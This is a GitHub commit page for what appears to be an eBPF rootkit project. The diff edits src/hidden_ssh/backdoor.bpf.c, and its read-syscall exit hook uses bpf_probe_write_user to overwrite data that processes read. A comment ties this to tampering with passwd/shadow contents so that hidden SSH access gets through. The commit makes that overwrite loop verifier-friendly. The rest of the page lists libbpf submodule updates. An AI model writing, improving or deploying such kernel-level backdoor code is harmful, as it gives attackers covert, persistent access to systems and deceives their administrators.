Skip to content

Commit

Permalink
fix: dynamic length eBPF writing
Browse files Browse the repository at this point in the history
  • Loading branch information
rphang committed Sep 3, 2024
1 parent 647f618 commit 40717eb
Show file tree
Hide file tree
Showing 2 changed files with 12 additions and 4 deletions.
2 changes: 1 addition & 1 deletion lib/libbpf
Submodule libbpf updated 66 files
+0 −3 .github/PULL_REQUEST_TEMPLATE.md
+5 −0 .github/actions/build-selftests/action.yml
+6 −7 .github/actions/build-selftests/build_selftests.sh
+2 −0 .github/actions/build-selftests/prepare_selftests-4.9.0.sh
+2 −0 .github/actions/build-selftests/prepare_selftests-5.5.0.sh
+93,225 −89,238 .github/actions/build-selftests/vmlinux.h
+7 −0 .github/actions/vmtest/action.yml
+5 −5 .github/workflows/build.yml
+2 −2 .github/workflows/codeql.yml
+1 −1 .github/workflows/coverity.yml
+1 −1 .github/workflows/lint.yml
+1 −1 .github/workflows/ondemand.yml
+2 −2 .github/workflows/pahole.yml
+6 −6 .github/workflows/test.yml
+21 −0 .mailmap
+1 −1 BPF-CHECKPOINT-COMMIT
+1 −1 CHECKPOINT-COMMIT
+1 −1 README.md
+69 −0 ci/diffs/0001-arch-Kconfig-Move-SPECULATION_MITIGATIONS-to-arch-Kc.patch
+0 −29 ci/diffs/0001-bpf-patch-out-BPF_F_TEST_REG_INVARIANTS-for-old-kern.patch
+32 −0 ci/diffs/0001-selftests-bpf-fix-inet_csk_accept-prototype-in-test_.patch
+0 −89 ci/diffs/0001-selftests-bpf-xskxceiver-ksft_print_msg-fix-format-t.patch
+56 −0 ci/diffs/0002-xdp-bonding-Fix-feature-flags-when-there-are-no-slav.patch
+1 −1 ci/vmtest/configs/ALLOWLIST-5.5.0
+15 −0 ci/vmtest/configs/DENYLIST
+1 −0 ci/vmtest/configs/DENYLIST-latest
+13 −0 ci/vmtest/configs/DENYLIST-latest.s390x
+2 −0 ci/vmtest/run_selftests.sh
+8 −0 docs/libbpf_overview.rst
+8 −0 include/linux/filter.h
+2 −0 include/linux/kernel.h
+175 −18 include/uapi/linux/bpf.h
+0 −120 include/uapi/linux/fcntl.h
+1 −0 include/uapi/linux/if_link.h
+4 −0 include/uapi/linux/if_xdp.h
+42 −3 include/uapi/linux/netdev.h
+0 −43 include/uapi/linux/openat2.h
+17 −2 include/uapi/linux/perf_event.h
+37 −0 scripts/mailmap-update.sh
+16 −0 scripts/sync-kernel.sh
+4 −4 src/Makefile
+51 −10 src/bpf.c
+74 −14 src/bpf.h
+53 −8 src/bpf_core_read.h
+220 −216 src/bpf_helper_defs.h
+21 −4 src/bpf_helpers.h
+35 −35 src/bpf_tracing.h
+529 −214 src/btf.c
+36 −0 src/btf.h
+10 −3 src/btf_dump.c
+177 −0 src/btf_iter.c
+519 −0 src/btf_relocate.c
+3 −2 src/elf.c
+613 −0 src/features.c
+992 −662 src/libbpf.c
+71 −4 src/libbpf.h
+17 −2 src/libbpf.map
+86 −12 src/libbpf_internal.h
+20 −5 src/libbpf_probes.c
+1 −1 src/libbpf_version.h
+46 −25 src/linker.c
+2 −2 src/netlink.c
+45 −8 src/ringbuf.c
+14 −2 src/str_error.c
+3 −0 src/str_error.h
+12 −12 src/usdt.bpf.h
14 changes: 11 additions & 3 deletions src/hidden_ssh/backdoor.bpf.c
Original file line number Diff line number Diff line change
Expand Up @@ -408,10 +408,18 @@ int read_exitpoint(struct trace_event_raw_sys_exit *ctx)
{
return 0; // You should not be here
}
if (ctx->ret > 0 && ctx->ret <= sizeof(file->buff))
int overwrite_len = 0; // need to reach to ctx->ret
for (int i = 0; i < 6500; i += 1) // arbitrary value
{
// bpf_printk("OVERWRITTEN PASSWD/SHADOW");
bpf_probe_write_user((void *)e->buff, (void *)file->buff, ctx->ret);
if (i + 1 > ctx->ret)
{
overwrite_len = i;
break;
}
}
if (overwrite_len > 0 && overwrite_len <= sizeof(file->buff) && overwrite_len <= ctx->ret)
{
bpf_probe_write_user((void *)e->buff, (void *)file->buff, overwrite_len);
}
}

Expand Down

0 comments on commit 40717eb

Please sign in to comment.